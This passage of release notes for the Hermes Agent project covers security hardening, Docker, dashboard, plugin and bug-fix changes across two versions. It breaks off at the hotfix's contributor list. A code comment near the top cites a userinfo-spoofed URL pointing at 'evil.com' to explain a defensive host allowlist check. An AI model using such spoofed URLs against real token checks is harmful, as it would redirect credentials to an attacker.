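    # Plain http would expose the bearer token on the wire.
    if parsed.scheme != "https":
        return False
    # hostname strips userinfo and port, so "https://x.ai@evil.com" resolves to evil.com.
    host = (parsed.hostname or "").lower()
    # Match the exact host or a dot-separated subdomain; a bare suffix match
    # would wrongly accept hosts such as "notx.ai".
    return any(host == h or host.endswith("." + h) for h in allowed_hosts)
```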
### Supply-chain
- **On-demand supply-chain audit via OSV.dev** — `hermes audit`. ([#31460](https://github.com/NousResearch/hermes-agent/pull/31460))
- `hermes update` syntax-validates critical files post-pull, auto-rollback on failure. ([#28669](https://github.com/NousResearch/hermes-agent/pull/28669))
- Quarantine `hermes.exe` vs concurrent Windows instance. ([#26677](https://github.com/NousResearch/hermes-agent/pull/26677))
### Other hardening
- Restrict default webhook toolset capabilities. ([#30745](https://github.com/NousResearch/hermes-agent/pull/30745))
- Harden Microsoft Graph webhook auth requirements. ([#30169](https://github.com/NousResearch/hermes-agent/pull/30169))
- Require source CIDR allowlisting for public msgraph webhook binds. ([#33722](https://github.com/NousResearch/hermes-agent/pull/33722))
- Require `API_SERVER_KEY` before dispatching API server work. ([#33232](https://github.com/NousResearch/hermes-agent/pull/33232))
- `env_passthrough`: apply GHSA-rhgp-j443-p4rf filter to `config.yaml` path. (@roadhero) ([#27794](https://github.com/NousResearch/hermes-agent/pull/27794))
- Dashboard + WeCom: restrict markdown link schemes; safe-parse untrusted XML. ([#32442](https://github.com/NousResearch/hermes-agent/pull/32442))
- Salvage project-plugin RCE bypass fix from PR [#29311](https://github.com/NousResearch/hermes-agent/pull/29311) (GHSA-5qr3-c538-wm9j). ([#30837](https://github.com/NousResearch/hermes-agent/pull/30837))
- Cross-profile soft guard on file-write tools + system-prompt hint. ([#31290](https://github.com/NousResearch/hermes-agent/pull/31290))
- Reject unsafe tar members in Android psutil compatibility installer. ([#33742](https://github.com/NousResearch/hermes-agent/pull/33742))
- Reject non-regular tar members during tirith auto-install. ([#33786](https://github.com/NousResearch/hermes-agent/pull/33786))
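
The two tar-related items above guard against archives that write outside the install directory or smuggle in links and device nodes. A minimal sketch of that kind of filter using the standard-library `tarfile` module; the function names are hypothetical and this is not the installer's actual code:

```python
import os
import tarfile


def is_safe_member(member: tarfile.TarInfo, dest_dir: str) -> bool:
    """Return True only for regular files and directories that stay inside dest_dir."""
    # Reject symlinks, hard links, devices, FIFOs, and any other non-regular entry.
    if not (member.isreg() or member.isdir()):
        return False
    # Reject absolute paths outright.
    if os.path.isabs(member.name):
        return False
    # Reject names that resolve outside the destination, e.g. "../evil".
    root = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(root, member.name))
    return os.path.commonpath([root, target]) == root


def safe_members(archive: tarfile.TarFile, dest_dir: str):
    """Yield only the members that pass is_safe_member; a stricter caller could raise instead."""
    for member in archive.getmembers():
        if is_safe_member(member, dest_dir):
            yield member
```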
---
## 🪟 Native Windows (Beta Continued)
- Complete Windows bootstrap — `dep_ensure` + `install.ps1` + detection. (@alt-glitch) ([#27845](https://github.com/NousResearch/hermes-agent/pull/27845))
- `install.ps1`: strip BOM, `-Commit`/`-Tag` pin params, harden git ops. (@jquesnelle) ([#28169](https://github.com/NousResearch/hermes-agent/pull/28169))
- Consolidate ACP browser bootstrap into `install.{sh,ps1}`. (@alt-glitch) ([#27851](https://github.com/NousResearch/hermes-agent/pull/27851))
- `hermes update` quarantines live `hermes.exe`. ([#26677](https://github.com/NousResearch/hermes-agent/pull/26677))
- Discord voice opus decoding on Windows. ([#33182](https://github.com/NousResearch/hermes-agent/pull/33182))
- Windows Docker Desktop compatible compose file. (@Sunil123135) ([#31031](https://github.com/NousResearch/hermes-agent/pull/31031))
---
## 🖥️ Web Dashboard
- Hardened Slack socket recovery + Windows restart dedupe. ([#28873](https://github.com/NousResearch/hermes-agent/pull/28873))
- Web dashboard: migrate checkboxes to `@nous-research/ui` + design-system polish. (@austinpickett) ([#28814](https://github.com/NousResearch/hermes-agent/pull/28814))
- Web dashboard: collapsible sidebar. (@austinpickett) ([#33421](https://github.com/NousResearch/hermes-agent/pull/33421))
- Dashboard typography & contrast pass. (salvage of [#28832](https://github.com/NousResearch/hermes-agent/pull/28832)) ([#30714](https://github.com/NousResearch/hermes-agent/pull/30714))
- Skills page: lazy-fetch catalog instead of bundling 34MB into JS. ([#33809](https://github.com/NousResearch/hermes-agent/pull/33809))
---
## 🐳 Docker
- **s6-overlay container supervision** — abstract `ServiceManager` protocol (systemd/launchd/Windows/s6 backends), per-profile gateway supervision in-container, container-restart reconciliation, hadolint/shellcheck CI. (salvage of [#30136](https://github.com/NousResearch/hermes-agent/pull/30136), @benbarclay) ([#31760](https://github.com/NousResearch/hermes-agent/pull/31760))
- Auto-redirect `gateway run` to supervised mode inside the s6 image. (@benbarclay) ([#33583](https://github.com/NousResearch/hermes-agent/pull/33583))
- Tee supervised gateway stdout to docker logs. (@benbarclay) ([#33621](https://github.com/NousResearch/hermes-agent/pull/33621))
- Drop `docker exec` to hermes uid before invoking the CLI. (@benbarclay) ([#33628](https://github.com/NousResearch/hermes-agent/pull/33628))
- Align HOME for dashboard and s6 gateway services. (@Dusk1e) ([#33481](https://github.com/NousResearch/hermes-agent/pull/33481))
- Bake build-time git SHA into image so `hermes dump` reports it. (@benbarclay) ([#33655](https://github.com/NousResearch/hermes-agent/pull/33655))
- `hermes update` prints `docker pull` guidance instead of bogus git error. (@benbarclay) ([#33659](https://github.com/NousResearch/hermes-agent/pull/33659))
- Upgrade Node to 22 LTS via multi-stage from `node:22-bookworm-slim`. (@benbarclay) ([#33060](https://github.com/NousResearch/hermes-agent/pull/33060))
- Drop `build-essential` from apt install. (@benbarclay) ([#33028](https://github.com/NousResearch/hermes-agent/pull/33028))
- Propagate env through s6 to cont-init and main CMD. ([#32412](https://github.com/NousResearch/hermes-agent/pull/32412))
- Targeted chown to preserve host file ownership in `HERMES_HOME`. ([#33033](https://github.com/NousResearch/hermes-agent/pull/33033))
- `mkdir HERMES_HOME` as root in stage2 before chown / privilege drop. ([#33078](https://github.com/NousResearch/hermes-agent/pull/33078))
- chown `ui-tui` and `node_modules` on UID remap so TUI esbuild works. ([#33045](https://github.com/NousResearch/hermes-agent/pull/33045))
- Include `anthropic`, `bedrock`, `azure-identity` extras in image. ([#30504](https://github.com/NousResearch/hermes-agent/pull/30504))
- Stop pushing per-commit SHA tags to Docker Hub. ([#29387](https://github.com/NousResearch/hermes-agent/pull/29387))
- Simplify Docker tagging — push both `:main` and `:latest` on main push. ([#33225](https://github.com/NousResearch/hermes-agent/pull/33225))
- Test slicing across GitHub Actions jobs. (@ethernet8023) ([#30575](https://github.com/NousResearch/hermes-agent/pull/30575))
- Discover agent-browser Chromium binary at boot. ([#33184](https://github.com/NousResearch/hermes-agent/pull/33184))
---
## 🌐 API Server
- **Session control API** — `/api/sessions/*` (list/create/read/patch/delete/fork) + SSE-streaming chat. (salvages [#29302](https://github.com/NousResearch/hermes-agent/pull/29302) by @Codename-11 + multimodal followup by @Schwartz10) ([#33134](https://github.com/NousResearch/hermes-agent/pull/33134))
- `GET /v1/skills` and `/v1/toolsets`. ([#33016](https://github.com/NousResearch/hermes-agent/pull/33016))
- Coerce stringified booleans in stream/store/approval payloads. (salvage [#26639](https://github.com/NousResearch/hermes-agent/pull/26639)) ([#27293](https://github.com/NousResearch/hermes-agent/pull/27293))
- Honor `key_env` in auth-failure fallback resolution. ([#30840](https://github.com/NousResearch/hermes-agent/pull/30840))
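
The boolean-coercion item above matters because in Python any non-empty string is truthy, so a payload value of `"false"` would otherwise be read as `True`. A minimal sketch of the idea, assuming a hypothetical helper name and accepted spellings (the actual API server may accept a different set):

```python
def coerce_bool(value, default=False):
    """Map JSON booleans and common string spellings to a real bool."""
    # Real booleans pass through unchanged.
    if isinstance(value, bool):
        return value
    if isinstance(value, str):
        text = value.strip().lower()
        if text in {"true", "1", "yes", "on"}:
            return True
        if text in {"false", "0", "no", "off"}:
            return False
    # Anything unrecognized (None, numbers, unknown strings) falls back to the default.
    return default
```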
---
## 🎟️ ACP (VS Code / Zed / JetBrains)
- Session edit auto-approval modes. (salvage of [#27034](https://github.com/NousResearch/hermes-agent/pull/27034)) ([#27862](https://github.com/NousResearch/hermes-agent/pull/27862))
- Enrich Zed permission cards — command in title + `reject_always`. ([#28148](https://github.com/NousResearch/hermes-agent/pull/28148))
- Replay session history before responding to `session/load`. ([#26957](https://github.com/NousResearch/hermes-agent/pull/26957), [#26943](https://github.com/NousResearch/hermes-agent/pull/26943))
- Plugin-transformed `final_response` delivered through streaming gate. ([#31433](https://github.com/NousResearch/hermes-agent/pull/31433))
---
## 🔌 Plugin Surface
- `register_tts_provider()` plugin hook. (salvage of [#30420](https://github.com/NousResearch/hermes-agent/pull/30420)) ([#31745](https://github.com/NousResearch/hermes-agent/pull/31745))
- `register_transcription_provider()` hook + `stt.providers` command-provider registry. (salvage of [#30493](https://github.com/NousResearch/hermes-agent/pull/30493)) ([#31907](https://github.com/NousResearch/hermes-agent/pull/31907))
- `register_auxiliary_task()` in PluginContext API. (salvage [#29817](https://github.com/NousResearch/hermes-agent/pull/29817)) ([#31177](https://github.com/NousResearch/hermes-agent/pull/31177))
- Bundled `security-guidance` plugin. ([#33131](https://github.com/NousResearch/hermes-agent/pull/33131))
- Discord and Mattermost migrated to bundled plugins. ([#30591](https://github.com/NousResearch/hermes-agent/pull/30591), [#31748](https://github.com/NousResearch/hermes-agent/pull/31748))
- ntfy as platform plugin. ([#30867](https://github.com/NousResearch/hermes-agent/pull/30867))
- Surface category-namespaced plugins in `hermes plugins list`. ([#27187](https://github.com/NousResearch/hermes-agent/pull/27187))
- Plugin discovery failures raised to WARNING level. ([#28318](https://github.com/NousResearch/hermes-agent/pull/28318))
- `hermes_plugins` included in gateway.log component filter. ([#28313](https://github.com/NousResearch/hermes-agent/pull/28313))
- Seed plugin extras before `is_connected` gate. ([#31703](https://github.com/NousResearch/hermes-agent/pull/31703))
- Dashboard: allowlist plugin assets + denylist subprocess-influencing env vars. ([#32277](https://github.com/NousResearch/hermes-agent/pull/32277))
---
## 📦 Distribution & Install
- Install-method stamping + Docker detection. (@alt-glitch) ([#27843](https://github.com/NousResearch/hermes-agent/pull/27843))
- Nix `#messaging` and `#full` package variants. (@alt-glitch) ([#33108](https://github.com/NousResearch/hermes-agent/pull/33108))
- Pre-load messaging gateway deps via `--extra messaging`. (salvage of [#26394](https://github.com/NousResearch/hermes-agent/pull/26394)) ([#27558](https://github.com/NousResearch/hermes-agent/pull/27558))
- Avoid piping installer directly into `iex` (Windows). ([#28347](https://github.com/NousResearch/hermes-agent/pull/28347))
- Ship bundled skills in wheel. ([#28421](https://github.com/NousResearch/hermes-agent/pull/28421))
- Ship dashboard plugin assets in wheel. ([#28406](https://github.com/NousResearch/hermes-agent/pull/28406))
- Make Camofox lazy-installed instead of eager. ([#27055](https://github.com/NousResearch/hermes-agent/pull/27055))
- Wire STT lazy-install into transcription_tools.py. ([#30256](https://github.com/NousResearch/hermes-agent/pull/30256))
---
## 🐛 Notable Bug Fixes (highlights only)
- Match bare custom provider by active base URL in `hermes model`. ([#28908](https://github.com/NousResearch/hermes-agent/pull/28908))
- Route `auxiliary.vision.provider=openai` to api.openai.com, skip text-only main. ([#31452](https://github.com/NousResearch/hermes-agent/pull/31452))
- Lint: skip per-file shell linter when LSP will handle the file. ([#29054](https://github.com/NousResearch/hermes-agent/pull/29054))
- Treat empty credential pool entries as unauthenticated in `/model` picker. ([#28312](https://github.com/NousResearch/hermes-agent/pull/28312))
- Reverted within window: Firecrawl integration tag, send_message @username auto-mentions, Telegram quick-command-only menus, Telegram pin-on-turn.
---
## 🧪 Testing
- Disarm lazy-install probe so `_HAS_FASTER_WHISPER` patches work. ([#30334](https://github.com/NousResearch/hermes-agent/pull/30334))
- Cover default board dashboard pin. ([#28361](https://github.com/NousResearch/hermes-agent/pull/28361))
- Cover `_task_dict` `task_age` fallback. ([#28365](https://github.com/NousResearch/hermes-agent/pull/28365))
- Allowlist `tmp_path` for `kanban_notify` artifact delivery tests. ([#30851](https://github.com/NousResearch/hermes-agent/pull/30851), [#30852](https://github.com/NousResearch/hermes-agent/pull/30852))
- Cover null output stream terminal events in Codex. ([#33137](https://github.com/NousResearch/hermes-agent/pull/33137))
---
## 📚 Documentation
- **30-day docs overhaul** — full correctness audit, every PR in the window covered, Nous Portal weave, sidebar reorg. ([#33782](https://github.com/NousResearch/hermes-agent/pull/33782))
- Dedicated Nous Portal integration page and setup guide. ([#31296](https://github.com/NousResearch/hermes-agent/pull/31296))
- Providers: move Nous Portal first, Google Gemini OAuth last. ([#31287](https://github.com/NousResearch/hermes-agent/pull/31287))
- `session_search` rewrite for single-shape tool. ([#27840](https://github.com/NousResearch/hermes-agent/pull/27840))
- Kanban: document failure_limit, max_retries, inline create shortcuts, goals & kanban settings. ([#28357](https://github.com/NousResearch/hermes-agent/pull/28357), [#28358](https://github.com/NousResearch/hermes-agent/pull/28358), [#28359](https://github.com/NousResearch/hermes-agent/pull/28359), [#28360](https://github.com/NousResearch/hermes-agent/pull/28360), [#28362](https://github.com/NousResearch/hermes-agent/pull/28362))
- Kanban Codex lane skill. ([#28430](https://github.com/NousResearch/hermes-agent/pull/28430))
- xAI OAuth: note X Premium+ also unlocks Grok OAuth. ([#29055](https://github.com/NousResearch/hermes-agent/pull/29055))
- Docs site: Docker audio bridge notes, "Installing more tools in the container", xurl auth HOME in Docker.
- Email: clarify gateway vs Himalaya setup. (@helix4u) ([#33634](https://github.com/NousResearch/hermes-agent/pull/33634))
- Auth docs: replace stale `hermes login` references with `hermes auth add`. ([#32859](https://github.com/NousResearch/hermes-agent/pull/32859))
---
## 👥 Contributors
### Core
- @teknium1 (lead)
### Notable salvages & cherry-picks
- **@benbarclay** — s6-overlay container supervision (29 commits salvaged), Node 22 LTS upgrade, build-essential cleanup, `gateway run` auto-redirect in s6, tee supervised stdout to docker logs, `hermes update` Docker guidance, build-time SHA stamping
- **@OutThisLife** — `mouse_tracking` DEC mode presets
- **@jquesnelle** — Windows installer hardening, `--branch` flag for `hermes update`, install.ps1 BOM strip / commit-pin
- **@alt-glitch** — Windows `dep_ensure` bootstrap, Nix package variants (`.#messaging`, `.#full`), install-method stamping, ACP browser bootstrap consolidation
- **@austinpickett** — `/update` slash command, dashboard checkboxes → `@nous-research/ui`, mobile dashboard polish, collapsible sidebar
- **@ethernet8023** — CI test slicing across GH Actions jobs, TUI clipboard copy fix
- **@kshitijk4poor** — doctor section banner + fail-and-issue helpers extraction, post-tag salvage cluster (curator-fallout, kanban SQLite hardening, install world-readable uv dirs, xAI bare-code paste)
- **@rewbs** — Nous JWT inference switch + refresh-token replay fix
- **@Codename-11** + **@Schwartz10** — session control API (REST + SSE + multimodal followup)
- **@Niraven** — kanban swarm topology helper
- **@Interstellar-code** — kanban worker visibility endpoints
- **@adybag14-cyber** — termux cold-start optimizations (multiple PRs)
- **@qike-ms** — Telegram in-place status edits design
- **@sprmn24** — ntfy adapter
- **@Jaaneek** — xAI Web Search provider plugin
- **@yannsunn** — xAI upstream adapter for `hermes proxy`
- **@Cybourgeoisie** — OpenRouter sticky routing via session_id
- **@memosr** — Nous Portal base_url allowlist validation
- **@Sunil123135** — Windows Docker Desktop compose file
- **@Dusk1e** — Docker HOME alignment for dashboard + s6 gateway services
- **@beardthelion** — opencode-go anthropic_messages routing
- **@YLChen-007** — Skills Guard multi-word prompt patterns
- **@roadhero** — env_passthrough GHSA-rhgp-j443-p4rf filter
- **@Zyrixtrex** — Google Chat OAuth credential persistence hardening
- **@briandevans**, **@tomqiaozc** — defense-in-depth read-deny on credential stores
- **@PratikRai0101** — control-plane file write protection
- **@helix4u**, **@Bartok9**, **@zccyman** — auxiliary fallback ladder components
- **@ms-alan**, **@ticketclosed-wontfix**, **@donovan-yohan** — TUI session orchestrator + follow-ups
- **@daimon-nous[bot]** — cron per-job profile support
- **@bisko** — re-pad `reasoning_content` on cross-provider fallback
### All Contributors
@02356abc, @0xchainer, @0xDevNinja, @0xjackyang, @0xsir0000, @0z1-ghb, @8bit64k, @aaronlab, @AceWattGit,
@ACR27, @adam91holt, @AdamPlatin123, @Ade5954, @AdityaRajeshGadgil, @adybag14-cyber, @AhmetArif0, @ai-hana-ai,
@alaamohanad169-ship-it, @alber70g, @albert748, @alt-glitch, @aqilaziz, @argabor, @asdlem, @austinpickett,
@avifenesh, @awizemann, @B0Tch1, @Bartok9, @BaxBit, @Beandon13, @beardthelion, @benbarclay, @bensargotest-sys,
@binhnt92, @bird, @bisko, @BlackishGreen33, @booker1207, @bradhallett, @briandevans, @Brixyy, @brndnsvr,
@BROCCOLO1D, @btorresgil, @burjorjee, @carltonawong, @Carry00, @chaconne67, @chdlc, @chromalinx, @ChyuWei,
@CipherFrame, @cmullins70, @CNSeniorious000, @codeblackhole1024, @Codename-11, @colin-chang, @counterposition,
@cresslank, @CryptoByz, @cyb0rgk1tty, @Cybourgeoisie, @daizhonggeng, @darvsum, @davidcampbelldc, @deas,
@dgians, @dillweed, @DoGMaTiiC, @donovan-yohan, @draplater, @Drexuxux, @dskwe, @dsr-restyn, @Dusk1e,
@dusterbloom, @duyua9, @egilewski, @el-analista, @eliteworkstation94-ai, @eloklam, @EloquentBrush0x, @emonty,
@emozilla, @erhnysr, @erikengervall, @Erosika, @ether-btc, @ethernet8023, @EvilHumphrey, @fabiosiqueira,
@falasi, @falconexe, @fardoche6, @felix-windsor, @Fewmanism, @ffr31mr, @flamiinngo, @flanny7, @flooryyyy,
@fonhal, @francip, @fujinice, @gianfrancopiana, @glennc, @Glucksberg, @godlin-gh, @Grogger, @guillaumemeyer,
@Gutslabs, @H-Ali13381, @hanzckernel, @haran2001, @hawknewton, @hayka-pacha, @hehehe0803, @helix4u, @HenkDz,
@Hermes, @hermesagent26, @Hinotoi-agent, @hongchen1993, @honor2030, @houenyang-momo, @ht1072, @hueilau,
@iamfoz, @ilonagaja509-glitch, @InB4DevOps, @indigokarasu, @Interstellar-code, @iqdoctor, @iRonin, @Jaaneek,
@JabberELF, @jacevys, @jackey8616, @jackjin1997, @jdelmerico, @jfuenmayor, @Jiahui-Gu, @JimLiu, @joe102084,
@JohnC1009, @jonpol01, @Jpalmer95, @Julientalbot, @justemu, @justincc, @jvinals, @karthikeyann, @kasunvinod,
@kchuang1015, @kenyonxu, @khungate, @kiranvk-2011, @kjames2001, @konsisumer, @kpadilha, @kriscolab,
@krislidimo, @kronexoi, @kshitijk4poor, @kunci115, @Kylejeong2, @kylekahraman, @LaPhilosophie, @leeseoki0,
@lemassykoi, @Lempkey, @LeonJS, @LeonSGP43, @lidge-jun, @LifeJiggy, @liuhao1024, @LizerAIDev, @loicnico96,
@loongfay, @m0n3r0, @malaiwah, @matthewlai, @mavrickdeveloper, @maxmilian, @McClean-Edison, @memosr,
@Mind-Dragon, @momowind, @MoonJuhan, @MoonRay305, @moortekweb-art, @MorAlekss, @ms-alan, @Nami4D,
@nehaaprasaad, @nekwo, @nftpoetrist, @NickLarcombe, @nidhi-singh02, @Niraven, @nnnet, @noctilust, @novax635,
@nthrow, @nv-kasikritc, @nycomar, @OCWC22, @oemtalks, @OmX, @ooovenenoso, @orcool, @oseftg, @outsourc-e,
@OutThisLife, @Paperclip, @PaTTeeL, @pepelax, @phoenixshen, @Pluviobyte, @pnascimento9596, @pochi-gio, @pr7426,
@PratikRai0101, @Prithvi1994, @psionic73, @ptichalouf, @Que0x, @QuenVix, @quocanh261997, @qWaitCrypto, @Qwinty,
@r266-tech, @rak135, @rdasilva1016-ui, @rewbs, @roadhero, @rodrigoeqnit, @RonHillDev, @roycepersonalassistant,
@rudi193-cmd, @RyanRana, @sadiksaifi, @samahn0601, @samggggflynn, @SamuelZ12, @sanghyuk-seo-nexcube,
@Saurav0989, @savanne-kham, @Schrotti77, @Schwartz10, @SerenityTn, @sgtworkman, @sharziki, @shaun0927,
@shellybotmoyer, @shunsuke-hikiyama, @SimbaKingjoe, @SimoKiihamaki, @sir-ad, @Slimydog21, @slowtokki0409,
@Soju06, @someaka, @soynchux, @sprmn24, @Stark-X, @steezkelly, @stepanov1975, @stephenschoettler,
@stevehq26-bot, @steveonjava, @Strontvod, @subtract0, @Sunil123135, @superearn-fisher, @Sylw3ster, @tchanee,
@that-ambuj, @thedavidmurray, @TheOnlyMika, @therahul-yo, @thewillhuang, @ticketclosed-wontfix, @Timur00Kh,
@tomqiaozc, @Tosko4, @Tranquil-Flow, @tw2818, @uzunkuyruk, @vaddisrinivas, @vanthinh6886, @vgocoder,
@victorGPT, @vynxevainglory-ai, @waefrebeorn, @walli, @wangpuv, @wanwan2qq, @wesleysimplicio, @worlldz,
@wpengpeng168, @WuKongAI-CMU, @wuli666, @Wysie, @xxxigm, @yannsunn, @YanzhongSu, @YarrowQiao, @ygd58,
@YLChen-007, @yoniebans, @yu-xin-c, @YuanHanzhong, @zapabob, @zccyman, @ziliangpeng, @zwolniony, @Zyrixtrex
---
**Full Changelog**: [v2026.5.16...v2026.5.28](https://github.com/NousResearch/hermes-agent/compare/v2026.5.16...v2026.5.28)
+110
@@ -0,0 +1,110 @@
# Hermes Agent v0.15.1 (v2026.5.29)
**Release Date:** May 29, 2026
**Since v0.15.0:** 28 commits · 21 merged PRs · hotfix release · 9 contributors
> **The Patch Release.** A same-day hotfix for v0.15.0. Headline fix: the dashboard infinite-reload loop that hit anyone running v0.15.0 in loopback mode (Docker, hosted Hermes, fresh installs). A handful of other v0.15.0 follow-ups go along for the ride — kanban worker SIGTERM, `/model` picker unification, `/yolo` session bypass, the full 19,932-entry skills.sh catalog, `.md` media delivery restoration, gateway probe-stepdown safety, web-URL redaction passthrough, kanban worker vision on referenced images, hindsight observation-default. Docker users get an explicit `--insecure` opt-in env var (no more bind-host inference), MCP server bare-command PATH resolution, and arm64 PR-build cache fixes.
---
## ✨ Highlights
- **Dashboard 401 reload loop fixed** — In loopback mode the dashboard's identity probe (`/api/auth/me`) returns 401 by design, but v0.15.0's stale-token reload guard treated every 401 as a rotated session token and full-page-reloaded to pick up a fresh one. Every successful sibling call cleared the one-shot reload guard, so the page reload-looped forever (Firefox: "Navigated to /sessions" storm; Chrome: React re-render storm). Fix adds an `allowUnauthorized` opt-out to `fetchJSON` that skips only the loopback stale-token reload — 401 still throws so `AuthWidget` swallows it, gated-mode `login_url` redirects are unaffected. Closes [#34206](https://github.com/NousResearch/hermes-agent/issues/34206), [#34202](https://github.com/NousResearch/hermes-agent/issues/34202). ([#30698](https://github.com/NousResearch/hermes-agent/pull/30698) — @austinpickett)
- **Docker dashboard `--insecure` is now an explicit env opt-in, never derived from bind host** — Previously the Docker entrypoint inferred `--insecure` when the dashboard bound to a non-loopback host. That conflated "I want LAN access" with "I want to disable the same-origin guard." The fix splits them: bind host is bind host, and disabling the dashboard's loopback auth requires an explicit `HERMES_DASHBOARD_INSECURE=1`. Existing setups that genuinely wanted insecure binding must now set the env var. ([#34188](https://github.com/NousResearch/hermes-agent/pull/34188), [#34204](https://github.com/NousResearch/hermes-agent/pull/34204) — @benbarclay)
- **MCP bare command resolution under Docker** — MCP servers configured with bare commands (`npx`, `npm`, `node`) now resolve against `/usr/local/bin` so they actually launch inside the Docker image where those binaries live. v0.15.0 left these failing silently in containers when the agent's effective PATH didn't include the Node toolchain location. ([#34186](https://github.com/NousResearch/hermes-agent/pull/34186) — @benbarclay)
- **Skills page sidebar / source pills restored** — A stale `useMemo` dependency in the new dashboard skills page collapsed the source pills and category sidebar to "All" only. Fixed; both surfaces now reflect the live catalog state. ([#34194](https://github.com/NousResearch/hermes-agent/pull/34194))
- **Kanban worker can be killed again** — `SIGTERM` on a kanban worker was being absorbed by an intermediate process and the worker stayed running. Closes [#28181](https://github.com/NousResearch/hermes-agent/issues/28181). ([#34045](https://github.com/NousResearch/hermes-agent/pull/34045))
- **Full skills.sh catalog (858 → 19,932 entries)** — The skills hub page was pulling a partial paginated catalog. The fetch now walks the sitemap, so all 19,932 skills.sh entries surface in the picker instead of just the first 858. ([#34025](https://github.com/NousResearch/hermes-agent/pull/34025))
---
## 🐛 Bug Fixes
### Dashboard / Web
- **`/api/auth/me` 401 no longer triggers reload loop** in loopback mode — ([#30698](https://github.com/NousResearch/hermes-agent/pull/30698) — @austinpickett)
- **Skills page source pills + category sidebar restored** — stale `useMemo` dep ([#34194](https://github.com/NousResearch/hermes-agent/pull/34194))
### Docker
- **`--insecure` is now explicit opt-in via env var**, not derived from bind host ([#34188](https://github.com/NousResearch/hermes-agent/pull/34188) — @benbarclay)
- **Dashboard test suite repaired** to match the insecure-opt-in fix ([#34204](https://github.com/NousResearch/hermes-agent/pull/34204) — @benbarclay)
- **arm64 PR builds skip the GHA cache** to avoid cache-thrash on cross-arch builders ([#33704](https://github.com/NousResearch/hermes-agent/pull/33704) — @BROCCOLO1D)
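
The split between bind host and insecure mode can be sketched as below. This is a minimal illustration, not the actual Docker entrypoint: the helper name `dashboard_args` and the `--host` flag are assumptions, and only `HERMES_DASHBOARD_INSECURE=1` and `--insecure` come from the notes above.

```python
import os
from typing import List, Mapping, Optional


def dashboard_args(bind_host: str, env: Optional[Mapping[str, str]] = None) -> List[str]:
    """Build dashboard CLI args (hypothetical helper, for illustration only)."""
    env = os.environ if env is None else env
    # The bind host is passed through as-is; `--host` is an assumed flag name.
    args = ["--host", bind_host]
    # Insecure mode is never inferred from the bind host. It requires the
    # explicit opt-in variable named in the release notes.
    if env.get("HERMES_DASHBOARD_INSECURE", "").strip() == "1":
        args.append("--insecure")
    return args
```

Under this sketch, binding to `0.0.0.0` without the variable yields no `--insecure` flag, which matches the "bind host is bind host" behavior described in the highlights.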
### MCP
- **Bare `npx`/`npm`/`node` resolve against `/usr/local/bin`** for Docker compatibility ([#34186](https://github.com/NousResearch/hermes-agent/pull/34186) — @benbarclay)
### Kanban
- **Worker SIGTERM actually terminates the process** ([#34045](https://github.com/NousResearch/hermes-agent/pull/34045))
- **Workers receive images referenced in task bodies** for vision-capable models ([#34210](https://github.com/NousResearch/hermes-agent/pull/34210))
### Gateway
- **`.md` files deliver again** — media-delivery validation defaults to denylist-only instead of an overly-narrow allowlist ([#34022](https://github.com/NousResearch/hermes-agent/pull/34022))
- **Probe stepdown safety** — on a context-overflow without an explicit provider context limit, the agent no longer steps down to a smaller model based on an unknown ceiling (salvage of [#33673](https://github.com/NousResearch/hermes-agent/pull/33673)) ([#33826](https://github.com/NousResearch/hermes-agent/pull/33826))
### CLI
- **`/yolo` mid-session enables the per-session bypass** instead of just toggling the env var (which the running agent had already snapshotted) ([#33931](https://github.com/NousResearch/hermes-agent/pull/33931) — @kshitijk4poor)
- **`/model` and `hermes model` show the same list**, plus disk cache for picker startup ([#33867](https://github.com/NousResearch/hermes-agent/pull/33867))
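
The `/yolo` item above turns on a snapshot problem: a value read from the environment at start-up does not change when the variable is toggled later. The toy class below illustrates that with a hypothetical variable name `EXAMPLE_YOLO` and a hypothetical `session_bypass` attribute; neither is the real Hermes identifier.

```python
import os


class Session:
    """Toy session that snapshots an env flag at start-up (illustrative only)."""

    def __init__(self) -> None:
        # Snapshot taken once; later changes to the environment are not observed.
        self._env_bypass = os.environ.get("EXAMPLE_YOLO") == "1"
        # Per-session flag that a mid-session command can flip directly.
        self.session_bypass = False

    def approvals_bypassed(self) -> bool:
        return self._env_bypass or self.session_bypass
```

Setting `EXAMPLE_YOLO` after the session is constructed leaves `approvals_bypassed()` unchanged, while setting `session_bypass = True` takes effect immediately.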
### Skills
- **Full skills.sh catalog via sitemap** — 858 → 19,932 entries ([#34025](https://github.com/NousResearch/hermes-agent/pull/34025))
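
As a rough illustration of sitemap walking, the sketch below extracts every `<loc>` entry from a standard sitemap document. It assumes the sitemaps.org XML namespace and covers only parsing; the function name `sitemap_locations` is hypothetical, and the actual fetch and pagination code in the PR is not shown here.

```python
import xml.etree.ElementTree as ET
from typing import List

# Standard sitemap namespace (sitemaps.org protocol 0.9).
SITEMAP_NS = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}


def sitemap_locations(xml_text: str) -> List[str]:
    """Return every <loc> URL from a sitemap or sitemap-index document."""
    root = ET.fromstring(xml_text)
    return [
        loc.text.strip()
        for loc in root.iterfind(".//sm:loc", SITEMAP_NS)
        if loc.text
    ]
```

A sitemap index nests further sitemap URLs in the same `<loc>` elements, so the same function can be applied to each level in turn.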
### Redaction
- **Web URLs pass through unchanged** — the redactor was eating query parameters that looked credential-shaped ([#34029](https://github.com/NousResearch/hermes-agent/pull/34029))
---
## ✨ Small Features
- **Hindsight default narrowed to observation-only** for `recall_types` — tool path is also narrowed ([#34079](https://github.com/NousResearch/hermes-agent/pull/34079) — @nicoloboschi, follow-up [#34091](https://github.com/NousResearch/hermes-agent/pull/4df62d239e38bf8c212a595721c9c01e176f6c3a) — @kshitijk4poor)
- **Memory providers receive completed-turn message context** — salvage of [#28065](https://github.com/NousResearch/hermes-agent/pull/28065) ([#34097](https://github.com/NousResearch/hermes-agent/pull/34097) — @kshitijk4poor, credit to @devwdave)
---
## 📚 Documentation
- **`--no-supervise` / `HERMES_GATEWAY_NO_SUPERVISE` documented** in the reference docs (follow-up to [#33583](https://github.com/NousResearch/hermes-agent/pull/33583)) ([#33751](https://github.com/NousResearch/hermes-agent/pull/33751) — @r266-tech)
---
## 🛠️ Infrastructure
- **Vercel deploy workflow accepts `workflow_dispatch`** so docs deploys can be manually triggered ([#34081](https://github.com/NousResearch/hermes-agent/pull/34081))
- **`@nous-research/ui` bumped to 0.18.2** (Nix `npmDepsHash` also updated to match) ([#34193](https://github.com/NousResearch/hermes-agent/pull/34193) follow-ups — @austinpickett)
---
## 👥 Contributors
### Core
- @teknium1
### Community
